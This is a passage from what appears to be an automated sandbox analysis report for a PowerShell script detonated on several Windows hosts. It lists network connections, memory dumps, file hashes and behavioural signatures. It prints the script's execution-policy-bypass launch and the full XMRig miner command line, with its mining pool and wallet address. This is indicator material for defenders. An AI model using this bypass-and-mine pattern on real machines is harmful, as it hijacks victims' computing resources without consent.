| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
memory/3144-0-0x00007FFCAD6B3000-0x00007FFCAD6B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hj5jtjsj.mlp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3144-1-0x000002532C470000-0x000002532C492000-memory.dmp
memory/3144-11-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-12-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-13-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-14-0x00007FFCAD6B3000-0x00007FFCAD6B5000-memory.dmp
memory/3144-15-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-17-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-18-0x000002532C950000-0x000002532C962000-memory.dmp
memory/3144-19-0x000002532C5B0000-0x000002532C5BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4048-50-0x000001EB0D5C0000-0x000001EB0D5E0000-memory.dmp
memory/4048-51-0x000001EBA1430000-0x000001EBA1450000-memory.dmp
memory/4048-52-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-55-0x000001EBA1AA0000-0x000001EBA1AC0000-memory.dmp
memory/4048-53-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-54-0x000001EBA1870000-0x000001EBA1890000-memory.dmp
memory/3144-57-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/4048-56-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-58-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-59-0x000001EBA1870000-0x000001EBA1890000-memory.dmp
memory/4048-60-0x000001EBA1AA0000-0x000001EBA1AC0000-memory.dmp
memory/4048-61-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-62-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-63-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-64-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-65-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-66-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-67-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-68-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-69-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-70-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-71-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-72-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-73-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-74-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-75-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-76-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-77-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-78-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-79-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-80-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-81-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
292s
Max time network
297s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1516 wrote to memory of 2464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1516 wrote to memory of 2464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| NL | 52.111.243.30:443 | | tcp |
Files
memory/1516-0-0x00007FFF60E53000-0x00007FFF60E55000-memory.dmp
memory/1516-3-0x0000015530290000-0x00000155302B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zavxre1a.ihv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1516-10-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-11-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-12-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-13-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-14-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-15-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-17-0x0000015530790000-0x00000155307A2000-memory.dmp
memory/1516-18-0x0000015530770000-0x000001553077A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2464-49-0x000001D26F200000-0x000001D26F220000-memory.dmp
memory/2464-50-0x000001D26F250000-0x000001D26F270000-memory.dmp
memory/2464-51-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-53-0x000001D26F270000-0x000001D26F290000-memory.dmp
memory/2464-54-0x000001D270B50000-0x000001D270B70000-memory.dmp
memory/2464-52-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-55-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-57-0x000001D26F270000-0x000001D26F290000-memory.dmp
memory/2464-56-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-58-0x000001D270B50000-0x000001D270B70000-memory.dmp
memory/2464-59-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-60-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-61-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-62-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-63-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-64-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-65-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-66-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-67-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-68-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-69-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-70-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-71-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-72-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-73-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-74-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-75-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-76-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-77-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-78-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-79-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-80-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240426-en
Max time kernel
297s
Max time network
280s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2420 wrote to memory of 4720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2420 wrote to memory of 4720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.73:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 73.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 23.62.61.73:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
memory/2420-0-0x00007FFE63123000-0x00007FFE63125000-memory.dmp
memory/2420-1-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/2420-7-0x0000018BA6160000-0x0000018BA6182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqqptchz.utz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2420-12-0x00007FFE63123000-0x00007FFE63125000-memory.dmp
memory/2420-13-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/2420-15-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/2420-16-0x0000018BA8780000-0x0000018BA8792000-memory.dmp
memory/2420-17-0x0000018BA8410000-0x0000018BA841A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4720-48-0x00000207582E0000-0x0000020758300000-memory.dmp
memory/4720-49-0x0000020758330000-0x0000020758350000-memory.dmp
memory/4720-50-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-53-0x0000020758350000-0x0000020758370000-memory.dmp
memory/4720-52-0x0000020758370000-0x0000020758390000-memory.dmp
memory/4720-51-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-54-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/2420-55-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/4720-56-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-58-0x0000020758350000-0x0000020758370000-memory.dmp
memory/4720-57-0x0000020758370000-0x0000020758390000-memory.dmp
memory/4720-59-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-60-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-61-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-62-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-63-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-64-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-65-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-66-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-67-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-68-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-69-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-70-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-71-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-72-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-73-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-74-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-75-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-76-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-77-0x00007FF736640000-0x00007FF737273000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
296s
Max time network
307s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4852 wrote to memory of 3096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4852 wrote to memory of 3096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/4852-0-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqzeluia.4k1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4852-10-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/4852-1-0x0000026484900000-0x0000026484922000-memory.dmp
memory/4852-11-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/4852-12-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/4852-15-0x000002649CD60000-0x000002649CD6A000-memory.dmp
memory/4852-14-0x000002649CD70000-0x000002649CD82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3096-46-0x0000010EF45D0000-0x0000010EF45F0000-memory.dmp
memory/3096-47-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/3096-48-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-49-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-50-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-51-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-52-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-53-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-54-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-55-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-56-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-57-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-58-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-59-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-60-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-61-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-62-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-63-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-64-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-65-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-66-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-67-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
